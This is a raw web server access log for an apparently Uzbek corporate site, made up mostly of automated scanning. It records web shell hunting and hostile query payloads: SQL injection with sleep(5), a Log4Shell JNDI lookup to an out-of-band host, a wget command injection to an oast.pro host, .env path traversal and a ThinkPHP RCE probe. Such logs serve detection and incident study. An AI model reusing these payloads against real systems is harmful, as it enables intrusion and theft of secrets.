34.123.149.87 - - [25/Aug/2026:00:38:01 +0500] "GET /?format=feed&type=atom&x=%7Bsource%7DTRIPROBE%7B/source%7D HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.104.50.220 - - [25/Aug/2026:00:37:53 +0500] "GET /wp-login.php HTTP/1.1" 404 1234 "-" "-"
147.224.240.109 - - [25/Aug/2026:00:38:08 +0500] "GET /en?start=12&template=accessibility HTTP/1.1" 508 288 "-" "Mozilla/5.0 (X11; Linux aarch64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
20.104.50.220 - - [25/Aug/2026:00:38:01 +0500] "GET /config.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:38:09 +0500] "GET /1337.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:38:17 +0500] "GET /w.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:38:23 +0500] "GET /wso.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:38:31 +0500] "GET /content.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:38:37 +0500] "GET /web.php HTTP/1.1" 404 1234 "-" "-"
85.208.96.209 - - [25/Aug/2026:00:38:40 +0500] "GET /uz/?a=fetch&start=66 HTTP/1.1" 200 63964 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
20.104.50.220 - - [25/Aug/2026:00:38:45 +0500] "GET /byp.php HTTP/1.1" 404 1234 "-" "-"
34.123.149.87 - - [25/Aug/2026:00:38:54 +0500] "GET /en/?cats=1*sleep(5)&s=37hvjGXHPCbAIjZcNaPR6DoKAsQ&start=12 HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.10.180.98 - - [25/Aug/2026:00:38:54 +0500] "GET /uz/?p=269&start=60 HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.104.50.220 - - [25/Aug/2026:00:38:54 +0500] "GET /fox.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:02 +0500] "GET /ss.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:08 +0500] "GET /baxa1.phP7 HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:09 +0500] "GET /json.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:09 +0500] "GET /shh.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:09 +0500] "GET /oga.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:09 +0500] "GET /nng.phpp HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:09 +0500] "GET /ava.php%22 HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:09 +0500] "GET /wpsearch/wp-login.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:10 +0500] "GET /sxp.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:10 +0500] "GET /27d28.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:10 +0500] "GET /ps.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:10 +0500] "GET /sa.php7 HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:10 +0500] "GET /shellv3.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:10 +0500] "GET /villain.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:10 +0500] "GET /shell_wso.php7 HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:18 +0500] "GET /red.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:18 +0500] "GET /lupo.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:18 +0500] "GET /jhdnZ.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:18 +0500] "GET /gh.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:19 +0500] "GET /new2.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:28 +0500] "GET /wp-content/themes/hueman/404.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:37 +0500] "GET /404.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:37 +0500] "GET /lc.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:37 +0500] "GET /bv3.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:37 +0500] "GET /ol.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:37 +0500] "GET /nc4.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:37 +0500] "GET /co.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:38 +0500] "GET /aua.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:38 +0500] "GET /Sanskrit.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:38 +0500] "GET /great.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:38 +0500] "GET /class9.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:39 +0500] "GET /ot.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:39 +0500] "GET /witmm.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:39 +0500] "GET /lo.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:39 +0500] "GET /new7.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:39 +0500] "GET /new14.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:39 +0500] "GET /new17.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:40 +0500] "GET /class7.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:40 +0500] "GET /file14.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:40 +0500] "GET /z57.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:40 +0500] "GET /o2.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:40 +0500] "GET /wsz.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:40 +0500] "GET /yyy.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:41 +0500] "GET /class-db.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:41 +0500] "GET /set.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:41 +0500] "GET /155.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:41 +0500] "GET /l.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:41 +0500] "GET /n3.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:41 +0500] "GET /1254.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:51 +0500] "GET /twso.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:39:51 +0500] "GET /file30.php HTTP/1.1" 404 1234 "-" "-"
116.179.32.209 - - [25/Aug/2026:00:39:51 +0500] "GET /?function=call_user_func_array&s=/Index/%20hinkpp/invokefunction&vars[0]=md5&vars[1][0]=HelloThinkPHP21&start=66 HTTP/1.1" 200 65154 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
20.104.50.220 - - [25/Aug/2026:00:40:00 +0500] "GET /kdrex.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:40:08 +0500] "GET /awh77.php HTTP/1.1" 508 288 "-" "-"
129.146.144.75 - - [25/Aug/2026:00:40:37 +0500] "GET /en/about-org-eng/general-information HTTP/1.1" 200 15418 "-" "Mozilla/5.0 (X11; Linux aarch64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
129.146.144.75 - - [25/Aug/2026:00:40:42 +0500] "GET /en/about-org-eng/general-information HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux aarch64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
161.153.116.148 - - [25/Aug/2026:00:40:43 +0500] "GET /en/stockholders-eng/information-eng?template=oloy HTTP/1.1" 200 15815 "-" "Mozilla/5.0 (X11; Linux aarch64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
85.208.96.201 - - [25/Aug/2026:00:40:45 +0500] "GET /uz/?start=66&wbraid=ClAKCQiApvebBhCkARI_AP1a6OurmVVFDQUiU9781eRVAyPHk-NZKVnDVdgFmmzARBqHYda4jYoY43CrlmulgCWZnLQ1g3r4dbyLKjECGgIBuQ HTTP/1.1" 200 64032 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
161.153.116.148 - - [25/Aug/2026:00:40:47 +0500] "GET /en/stockholders-eng/information-eng?template=oloy HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux aarch64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
185.191.171.12 - - [25/Aug/2026:00:41:38 +0500] "GET /?plot=%3Bwget%20http%3A%2F%2Fce4utud5ele8pmo00010s3w41yracacis.oast.pro&start=30 HTTP/1.1" 200 63783 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
136.119.35.120 - - [25/Aug/2026:00:41:57 +0500] "GET /?a=register&c=user&m=default&start=6&u=0 HTTP/1.1" 200 62631 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
216.73.216.183 - - [25/Aug/2026:00:42:41 +0500] "GET /robots.txt HTTP/1.1" 200 865 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
34.10.180.98 - - [25/Aug/2026:00:42:43 +0500] "GET /uz/?rest_route=/batch/v1&start=12 HTTP/1.1" 200 62833 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
216.73.216.183 - - [25/Aug/2026:00:43:03 +0500] "GET /sitemap.xml HTTP/1.1" 508 288 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
85.208.96.205 - - [25/Aug/2026:00:43:05 +0500] "GET /uz/?a=1&of=1&start=6 HTTP/1.1" 200 61149 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.171.68.95 - - [25/Aug/2026:00:43:23 +0500] "GET /uz/stockholders-uzb/corporate-governance-uzb/2-uncategorised?format=feed&type=atom HTTP/1.1" 200 38234 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
85.208.96.205 - - [25/Aug/2026:00:43:44 +0500] "GET /uz/?file=..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2F.env&start=60 HTTP/1.1" 200 62516 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
207.46.13.6 - - [25/Aug/2026:00:44:07 +0500] "GET /uz/?vars[0]=md5&vars[1][0]=HelloThinkPHP21&start=78 HTTP/1.1" 508 288 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
85.208.96.202 - - [25/Aug/2026:00:43:57 +0500] "GET /?function=call_user_func_array&s=%2FIndex%2F%20hink&start=66 HTTP/1.1" 200 64977 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.197 - - [25/Aug/2026:00:44:40 +0500] "GET /uz/contacts-uzb?template=oloy HTTP/1.1" 200 39227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.244.66.231 - - [25/Aug/2026:00:44:54 +0500] "GET /?controller=commentgrade&start=72 HTTP/1.1" 200 56625 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.231 - - [25/Aug/2026:00:45:33 +0500] "GET /?of=1&start=18 HTTP/1.1" 200 63882 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
52.167.144.206 - - [25/Aug/2026:00:46:06 +0500] "GET /uz/?location=search&start=18 HTTP/1.1" 508 288 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
23.94.155.94 - - [25/Aug/2026:00:46:12 +0500] "GET /wp-includes/css/buttons.css HTTP/1.1" 508 288 "-" "Go-http-client/1.1"
23.94.155.94 - - [25/Aug/2026:00:46:12 +0500] "GET /media/system/js/core.js HTTP/1.1" 200 8808 "-" "Go-http-client/1.1"
216.244.66.231 - - [25/Aug/2026:00:46:10 +0500] "GET /uz/about-org-uzb/strategy-uzb/6193-fixed-assets/9749-dog-10-2022-xlsx HTTP/1.1" 200 32210 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
20.251.63.238 - - [25/Aug/2026:00:46:50 +0500] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:46:50 +0500] "GET /this_is_a_new_hello_world.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:46:50 +0500] "GET /ap.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:46:50 +0500] "GET /media.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:46:51 +0500] "GET //adminfuns.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:46:52 +0500] "GET /classwithtostring.php?p= HTTP/1.1" 404 1234 "-" "-"
216.244.66.231 - - [25/Aug/2026:00:46:54 +0500] "GET /?wordpress_x_core=check&start=30 HTTP/1.1" 200 63531 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
20.251.63.238 - - [25/Aug/2026:00:47:02 +0500] "GET /3PJcpMFsD8B.php HTTP/1.1" 404 1234 "-" "-"
34.10.180.98 - - [25/Aug/2026:00:47:12 +0500] "GET /en/?start=12&x=$%7Bjndi:ldap://$%7B:-744%7D$%7B:-364%7D.$%7Bhostname%7D.uri.d5393qd2ent3c0b7hdc0u3ktdnw4155kc.oast.fun/a%7D HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.251.63.238 - - [25/Aug/2026:00:47:10 +0500] "GET /5PJcpMFsD8B.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:47:18 +0500] "GET /4PJcpMFsD8B.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:47:25 +0500] "GET /wsd.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:47:32 +0500] "GET /pk.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:47:40 +0500] "GET /bulet.php HTTP/1.1" 404 1234 "-" "-"
216.244.66.231 - - [25/Aug/2026:00:47:37 +0500] "GET /?wbraid=ClAKCQiApvebBhCkARI_AP1a6OurmVVFDQUiU9781eRVAyPHk-NZKVnDVdgFmmzARBqHYda4jYoY43CrlmulgCWZnLQ1g3r4dbyLKjECGgIBuQ&start=12 HTTP/1.1" 200 63793 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
20.251.63.238 - - [25/Aug/2026:00:47:47 +0500] "GET //av.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:47:54 +0500] "GET /images.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:48:02 +0500] "GET /ops.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:48:09 +0500] "GET /coffexium.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:48:17 +0500] "GET /BDKR28WP.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:48:17 +0500] "GET /sf.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:48:17 +0500] "GET /k.php?p= HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:48:18 +0500] "GET /82.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:48:18 +0500] "GET /dex.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:48:18 +0500] "GET /inso.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:48:18 +0500] "GET //aa.php HTTP/1.1" 508 288 "-" "-"
216.244.66.231 - - [25/Aug/2026:00:48:18 +0500] "GET /uz/stockholders-uzb/comissions-uzb/6193-fixed-assets/9844-reestr-xarid-09-2023-xlsx HTTP/1.1" 508 288 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
20.251.63.238 - - [25/Aug/2026:00:48:18 +0500] "GET /img.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:48:26 +0500] "GET /222.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:48:35 +0500] "GET /key.php HTTP/1.1" 404 1234 "-" "-"
185.191.171.16 - - [25/Aug/2026:00:48:32 +0500] "GET /uz/officially-uzb/purchasing-commission-documentation-uzb HTTP/1.1" 200 38160 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
20.251.63.238 - - [25/Aug/2026:00:48:44 +0500] "GET /chosen.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:48:52 +0500] "GET /wpxml.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:48:59 +0500] "GET /file1221.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:49:06 +0500] "GET /nox.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:49:13 +0500] "GET /akismet.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:49:20 +0500] "GET /admin.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:49:29 +0500] "GET /ajax.php HTTP/1.1" 404 1234 "-" "-"
52.167.144.194 - - [25/Aug/2026:00:49:35 +0500] "GET /?function=call_user_func_array&s=/Index/%20hinkpp/invokefunction&vars[0]=md5&vars[1][0]=HelloThinkPHP21&start=24 HTTP/1.1" 200 63001 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
20.251.63.238 - - [25/Aug/2026:00:49:38 +0500] "GET /atomlib.php HTTP/1.1" 404 1234 "-" "-"
85.208.96.202 - - [25/Aug/2026:00:49:39 +0500] "GET /uz/officially-uzb/vacancies-uzb/6193-fixed-assets/9903-reestr-xarid-12-2024 HTTP/1.1" 200 32284 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
20.251.63.238 - - [25/Aug/2026:00:49:47 +0500] "GET /1.php?p= HTTP/1.1" 404 1234 "-" "-"
34.30.223.149 - - [25/Aug/2026:00:49:46 +0500] "GET /uz/?format=feed&p=837&type=atom HTTP/1.1" 200 12834 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.251.63.238 - - [25/Aug/2026:00:49:53 +0500] "GET /samll.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:49:58 +0500] "GET /she11.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:50:04 +0500] "GET /kerang.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:50:12 +0500] "GET /m.php?p= HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:50:18 +0500] "GET /fling.php?p= HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:50:24 +0500] "GET /btyuio.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:50:32 +0500] "GET /dehnl.php HTTP/1.1" 404 1234 "-" "-"
34.171.68.95 - - [25/Aug/2026:00:50:39 +0500] "GET /uz/component/search/?Itemid=17237&catid=2&format=opensearch&id=9731 HTTP/1.1" 200 718 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.251.63.238 - - [25/Aug/2026:00:50:40 +0500] "GET /234717/index.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:50:49 +0500] "GET /zoo2.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:50:57 +0500] "GET /zoo1.php?p= HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:50:58 +0500] "GET /radio.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:50:58 +0500] "GET /hoket.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:50:58 +0500] "GET /one.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:50:58 +0500] "GET /503.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:50:58 +0500] "GET /504.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:50:58 +0500] "GET /admin.php?p= HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:50:58 +0500] "GET /ws85.php?p= HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:50:58 +0500] "GET /db.php/new.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:50:58 +0500] "GET /ffs.php HTTP/1.1" 508 288 "-" "-"
54.197.178.107 - - [25/Aug/2026:00:50:58 +0500] "GET /uz/about-org-uzb/direction-uzb HTTP/1.1" 508 288 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.251.63.238 - - [25/Aug/2026:00:50:58 +0500] "GET /nano.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:51:05 +0500] "GET /ano.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:51:05 +0500] "GET /mgrr.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:51:06 +0500] "GET /mac.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:51:06 +0500] "GET /ngcvjkys.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:51:06 +0500] "GET /simple.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:51:06 +0500] "GET /xty.php?p= HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:51:06 +0500] "GET /sallu.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:51:06 +0500] "GET /codex.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:51:06 +0500] "GET /666.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:51:06 +0500] "GET /5656.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:51:06 +0500] "GET /filemanager.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:51:06 +0500] "GET /w3llscc.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:51:06 +0500] "GET /w3lls.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:51:07 +0500] "GET /fpwch.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:51:07 +0500] "GET /domvf.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:51:07 +0500] "GET /biufile.php HTTP/1.1" 508 288 "-" "-"
34.10.180.98 - - [25/Aug/2026:00:51:03 +0500] "GET /uz/?redirect=https://interact.sh/&start=54 HTTP/1.1" 200 63341 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.251.63.238 - - [25/Aug/2026:00:51:07 +0500] "GET /ammika.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:51:17 +0500] "GET /aogyvlbb.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:51:24 +0500] "GET /blacks.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:51:33 +0500] "GET /czq.php HTTP/1.1" 404 1234 "-" "-"
52.167.144.194 - - [25/Aug/2026:00:51:36 +0500] "GET /uz/about-org-uzb/general-info-uzb HTTP/1.1" 200 61334 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
20.251.63.238 - - [25/Aug/2026:00:51:40 +0500] "GET /beck.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:52:07 +0500] "GET /t3.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:52:07 +0500] "GET /nope.php HTTP/1.1" 508 288 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:52:07 +0500] "GET /wp.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:52:15 +0500] "GET //abcd.php HTTP/1.1" 404 1234 "-" "-"
137.131.36.200 - - [25/Aug/2026:00:52:24 +0500] "GET /uz/officially-uzb/ustav-uzb/9789-ustav-20-01-2023-uz HTTP/1.1" 508 288 "-" "Mozilla/5.0 (X11; Linux aarch64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
137.131.36.200 - - [25/Aug/2026:00:52:19 +0500] "GET /uz/officially-uzb/ustav-uzb/9789-ustav-20-01-2023-uz HTTP/1.1" 200 15418 "-" "Mozilla/5.0 (X11; Linux aarch64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
20.251.63.238 - - [25/Aug/2026:00:52:23 +0500] "GET /nofile.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:52:32 +0500] "GET /run.php HTTP/1.1" 404 1234 "-" "-"
20.251.63.238 - - [25/Aug/2026:00:52:40 +0500] "GET /new.php HTTP/1.1" 404 1234 "-" "-"
